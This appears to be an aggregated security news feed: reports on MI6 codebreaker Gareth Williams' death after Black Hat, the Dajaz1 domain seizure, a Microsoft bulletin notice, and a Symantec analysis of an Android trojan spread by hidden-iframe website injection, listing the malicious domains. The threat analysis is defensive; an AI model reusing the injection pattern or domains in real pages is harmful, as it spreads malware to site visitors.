MI6 Codebreaker Attended U.S. Security Conference Before His Death

MI6 coder Gareth Williams captured by a surveillance camera before his death. Image: Courtesy of the Metropolitan Police

A top British codebreaker who died a mysterious death in his flat two years ago had just returned from a computer security conference in the United States before his death, according to information disclosed during an inquest this week.

The body of Gareth Williams, a codebreaker with Britain’s MI6 spy agency, was discovered stuffed into a sports bag in his bathtub on Aug. 23, 2010, though he’s believed to have been killed Aug. 15.

Williams had just returned to London on Aug. 11 after spending six weeks in the United States, where he attended the annual Black Hat security conference in Las Vegas as part of a contingent of British spies, according to witnesses who spoke at the inquest. He attended Black Hat in 2008 as well.

It’s believed Williams may have also attended Black Hat’s companion hacker conference, DefCon, which follows Black Hat and draws many of the same attendees. In 2010, Black Hat was held July 24 to 29, while DefCon ran from July 30 to Aug. 1.

Black Hat is one of the top security conferences in the world, targeting the professional security crowd, while DefCon is geared more specifically to hackers. Law enforcement agents, the military and undercover spies regularly attend both conferences — often undercover — to keep pace with the latest research and learn what hackers are up to. They also recruit hackers for professional work.

DefCon holds an annual spot-the-fed contest to out undercover agents as a good-natured sport. Attendees who spot a fed receive an “I spotted a Fed” T-shirt, while the outed agent gets a trophy T-shirt of his own to take back to his office, sporting the phrase “I was spotted at DefCon.”

Not everyone wants to be outed or plays by the conference ground rules for working undercover. Several years ago, undercover agents believed to be working for Israel’s Mossad spy agency were kicked out of the conference after registering as journalists and posing as a French film crew from Canal Plus.

It’s not known specifically why Williams attended Black Hat or if he and his colleagues attended incognito. A Black Hat organizer did not immediately respond to a request for comment.

Williams, who was 31 when he died, was found inside a North Face nylon sports bag in the bathtub of his apartment. His nude body was in the fetal position, with his arms folded across his chest. The bag was closed with a padlock, and two keys to the padlock were found underneath Williams’ body inside the bag.

MI6 coder Gareth Williams attended the Black Hat security conference in the U.S. with fellow spies days before his mysterious death. Photo: Courtesy of the Metropolitan Police

His mobile phone and a number of SIM cards were laid out on a table nearby; the phone had been restored to its factory settings. There were no signs of forced entry to the apartment and no signs of a struggle.

Williams was described by those who knew him as a “math genius” who graduated from Bangor University at the age of 17 with a degree in mathematics. He’d begun his university studies while still in secondary school. In 2001 he joined Government Communications Headquarters (GCHQ), Britain’s listening post, helping to break coded Taliban communications, among other things. He was considered a “world-class intelligence officer” and had won two awards for codebreaking, according to his boss at GCHQ.

In 2009, he was loaned out to MI6, Britain’s foreign intelligence service, for a three-year stint, but asked to be transferred back to GCHQ after a year. He was preparing to move back to his old job around the time he was killed.

Williams had worked in a four-man team as an expert codebreaker and shortly before his death had been in contact with two secret agents working in the field in the U.K., according to testimony at the inquest.

The Daily Mail quoted anonymous sources last year saying that Williams had been working on secret technology to track stolen money being laundered through Britain by Russian mafia. The technology was reportedly designed to allow MI6 agents to follow money from bank accounts in Russia to criminal gangs in Europe via internet and wire transfers.

He also worked on another secretive project to develop devices for stealing data from mobile phones and laptops using wireless technology.

“He was involved in a very sensitive project with the highest security clearance,” the anonymous source told the Daily Mail. “He was not an agent doing surveillance, but was very much part of the team, working on the technology side, devising stuff like software.”

The source indicated that Williams’ work to disrupt the Russian mafia could have put him at risk.

“Some of these powerful criminal networks have links with, and employ, former KGB agents who can track down people like Williams,” the source said.

Williams also had reportedly worked with the NSA and British intelligence to intercept e-mail messages that helped convict would-be bombers in the United Kingdom. He had made repeated visits to the United States to meet with the National Security Agency and worked closely with British and U.S. spy agencies to intercept and examine communications that passed between an al-Qaida official in Pakistan and three men who were convicted in 2009 of plotting to bomb transcontinental flights.

Investigators said during the inquest that there was no evidence Williams was killed as a result of the work he was doing, but they acknowledged that a full investigation had been thwarted by the spy agencies who employed Williams, raising suspicions that the agencies might have been involved in his death or at least know who was responsible for it.

Hours before he died, surveillance cameras captured Williams in London’s Knightsbridge neighborhood while he was shopping at the luxury department store Harrods. Williams was expected at work the next day, but never showed up. MI6 did not report him missing, however, until Aug. 23, at which point his body had decomposed, thwarting attempts to determine the precise cause of death.

The spy agencies also failed to hand over nine thumb drives found in Williams’ locker at work. The drives were released to investigators only this week. Other electronic equipment that Williams used at work was handed over to Scotland Yard investigators four days after Williams’ body was discovered, raising questions about whether they had been cleaned by the spy agencies first.

Family and friends testified that Williams was unhappy with his work environment at MI6 and felt he didn’t fit in with his colleagues. During the inquest, testimony revealed that the coder had conducted unauthorized searches of an MI6 database that could have put him at risk if he was discovered. Investigators said, however, that MI6 was apparently unaware that Williams had conducted the searches.

A coroner said at the inquest that while it appeared unlikely that British spy agencies played a role in the coder’s death, it was still a “legitimate line of inquiry” for the investigation.

Investigators found no fingerprints or any other evidence indicating someone had been with Williams the night he died, or that anyone beyond his family had ever been in his apartment. Investigators said at the inquest that small traces of incomplete DNA had been found on the tiny padlock that had been used to close the bag in which Williams’ body was stuffed. The only other DNA evidence found in the apartment that didn’t belong to Williams or his family was found on a green hand towel in the kitchen.

Authorities plan to take DNA evidence from 50 colleagues who worked with Williams at MI6 to determine if there is a match.

Feds Seized Hip-Hop Site for a Year, Waiting for Proof of Infringement

For more than a year, and without explanation, the government redirected hip-hop site Dajaz1.com to this landing page.

Federal authorities who seized a popular hip-hop music site based on assertions from the Recording Industry Association of America that it was linking to four “pre-release” music tracks gave it back more than a year later without filing civil or criminal charges because of apparent recording industry delays in confirming infringement, according to court records obtained by Wired.

The Los Angeles federal court records, which were unsealed Wednesday at the joint request of Wired, the Electronic Frontier Foundation and the First Amendment Coalition, highlight a secret government process in which a judge granted the government repeated time extensions to build a civil or criminal case against Dajaz1.com, one of about 750 domains the government has seized in the last two years in a program known as Operation in Our Sites.

Apparently, however, the RIAA and music labels’ evidence against Dajaz1, a music blog, never came. Or, if it did, it was not enough to build a case and the authorities returned the site nearly 13 months later without explanation or apology.

Cindy Cohn, the EFF’s legal director, said the site’s 13-month seizure by the Immigration and Customs Enforcement bureau highlights the RIAA’s influence over the government. President Barack Obama has tapped at least five former RIAA attorneys for senior positions in the Justice Department.

“Here you have ICE making a seizure, based on the say-so of the record company guys, and getting secret extensions as they wait for their masters, the record companies, for evidence to prosecute,” Cohn said in a telephone interview. “This is the RIAA controlling a government investigation and holding it up for a year.”

ICE, a branch of the Department of Homeland Security, has the power to seize web domains engaged in infringing activity under the same forfeiture laws used to seize property like houses, cars and boats allegedly tied to illegal activity such as drug running or gambling. But seizing a domain name raises First Amendment concerns — though nothing in the court records show that the government or the court was concerned about the prolonged seizure of the site that is akin to an online printing press.

In the Dajaz1 case, the authorities seized the site in November 2010 on the word of the RIAA that four songs linked to on the site were unauthorized, the records show. Yet nearly a year later, in September 2011, the government was secretly seeking yet another extension to build its case, ostensibly because it was still waiting for the recording industry to produce evidence, the records show. All the while, the site’s owner and his attorney were left out of the loop, as the court record was sealed from them and the public. The Dajaz1 site was redirected to a government landing page saying it was seized by customs officials.

On Sept. 7, 2011, about 11 months after the government seized Andre Nasib’s site, a Department of Homeland Security agent wrote a declaration to U.S. District Judge Margaret Morrow of Los Angeles, explaining the reason for seeking a third time extension to build a case. The agent said “a sampling of content obtained from the Dajaz1.com website and its purported affiliate websites was submitted for rights holder evaluation and has yet to be returned.”

The agent, Andrew Reynolds, wrote virtually the exact same sentence in a July 13, 2011 declaration (.pdf), in which the government sought its second extension of time to build a case.

However, Reynolds’ declaration in September for the first time mentioned the RIAA by name.

“Additionally, a representative with the Recording Industry Association of America (RIAA) has stated that he will provide a very comprehensive statement to ICE’s and CBP’s [Customs and Border Protection’s] outstanding questions, in coordination with corresponding rights holders, which will be forthcoming in approximately 30 days,” Reynolds wrote. (.pdf)

Other than the unsealing orders won by Wired, EFF and the First Amendment Coalition, that Reynolds filing was the last one in the case — meaning the record does not say whether the RIAA or other industry players ever produced the promised report.

The Los Angeles federal prosecutor in the case, Steven Welk, did not respond for comment. Welk’s office agreed to unseal the documents, but said that it did so without conceding there was any First Amendment or common law necessity to do so. In December, when the site was returned, the authorities said it was “the appropriate and just result.”

The RIAA declined to comment on the unsealed documents, which Wired provided to it for review.

Instead, the industry lobbying group pointed Wired to its statement in December, when Dajaz1 was returned:

We understand that a decision was made that this particular site did not merit a criminal forfeiture proceeding. We respect that government agencies must consider a range of technical issues when exercising their independent prosecutorial discretion. Criminal proceedings are not always brought, for a variety of appropriate reasons.

With respect to Dajaz1, we would note that this particular website has specialized in the massive unauthorized distribution of pre-release music — arguably the worst and most damaging form of digital theft. […]

If the site continues to operate in an illegal manner, we will consider all our legal options to prevent further damage to the music community.

We are aware of statements by the site operator that suggest that music companies themselves were the source of at least some of the thousands of recordings available on Dajaz1. Even assuming this to be accurate, it does not excuse the thousands of other pre-release tracks also made available which were neither authorized for commercial distribution nor for uploading to publicly accessible sites where they were readily downloadable for free.

Dajaz1′s owner, Nasib, of New York, declined comment through his attorney, Andrew Bridges.

In December, Nasib told The New York Times that the recording industry offered him the four songs that were at the center of the case against him.

“It’s not my fault if someone at a record label is sending me the song,” the paper quoted him as saying.

The site’s seizure was based on an affidavit (.pdf) from Reynolds, who said he streamed or downloaded four songs hosted in cyberlockers — filezee.com and usershare.net — that were linked on Nasib’s site. The songs in question were “Deuces” by Chris Brown; “Fall for Your Type” by Jamie Foxx; “Long Gone” by Nelly and “Mechanics” by Reek Da Villian. Reynolds, in his seizure affidavit, wrote that he consulted with “RIAA representatives” when drafting the affidavit to verify that the songs were unauthorized.

Bridges said in a telephone interview that Nasib’s site, which is now up and running again, should never have been seized.

“To begin with,” Bridges said, “I don’t think there was any evidence of criminal copyright infringement.”

Microsoft Releases Advanced Notification for May Security Bulletin

Microsoft has published a Security Bulletin Advanced Notification indicating that its May release will contain seven bulletins. These bulletins will have the severity rating of critical and important and will be for Microsoft Windows, Office, .NET Framework, and Silverlight. Releases of these bulletins are scheduled for Tuesday, May 8, 2012.

US-CERT will provide additional information as it becomes available.

This product is provided subject to this Notification and this Privacy & Use policy.

Website Injection-Campaign Used in Conjunction with an Android Trojan

Back in December of 2011, Symantec identified the first case of an Android threat that was used in conjunction with a website-injection campaign targeting sites in the Middle East. Android.Arspam was an Android Trojan that redirected users to sites where a Hacktivist message was being delivered.

Today another website-injection campaign has come to light involving Android; only this time, the campaign involves the distribution of a mobile threat. This is not a typical drive-by-download whereby the application is automatically installed through an exploit – but rather the user is prompted to install the application after download.

Originally reported by the owner of an infected site on a social-bookmarking website, multiple sites have now emerged with a URL-redirect injected into the HTML body of an infected page. Reminiscent of Android.Bgserv, a malicious version of a Google security patch discovered by Symantec last year, the Trojan is delivered as a fake security package. Devices that allow installation from ’Unknown Sources’ are most susceptible to this type of attack as the user has to manually accept the permissions and prompts that are requested prior to an installation.

The following domains have been identified so far based on our investigation:

  • [http://]androidbia.info
  • [http://]androidjea.info
  • [http://]gaoanalitics.info
  • [http://]androidonlinefix.info

The website injection is of the form:

<iframe style="visibility: hidden; display: none; display: none;"

This injection has been identified not only on HTML sites, but also in robots.txt files. Therefore, it could well be the case that all files on the compromised Web server will have this iframe appended to it.

The payload itself is not very complicated to understand. Not obfuscated; just a few simple proxy and socket routines that can be used by the author of the threat to route traffic from an infected device to an external source. The real concern of this threat lies not in its immediate functionality, but in what it is capable of doing on behalf of an external force. As called out in our latest version of the Symantec ISTR report, threats like these represent a change in strategies by malware developers, moving away from traditional “smash-and-grab” jobs, like premium-SMS scams, to more sophisticated issues like privacy concerns and the theft of sensitive content used in extortion rackets, click-jacking etc.

With Norton Safeweb technology, this attack is blocked before the application even starts its download; unlike some other mobile security suites that rely solely on detecting threats after the download or during installation. Symantec currently detects this threat as Android.Notcompatible.

With Bring Your Own Device (BYOD) adoption increasing astronomically; threats like these represent a change in the paradigm in mobile malware. Although the number of sites compromised so far is small in number, it opens up the possibility for large scale web-injection attacks in order to distribute malicious mobile applications.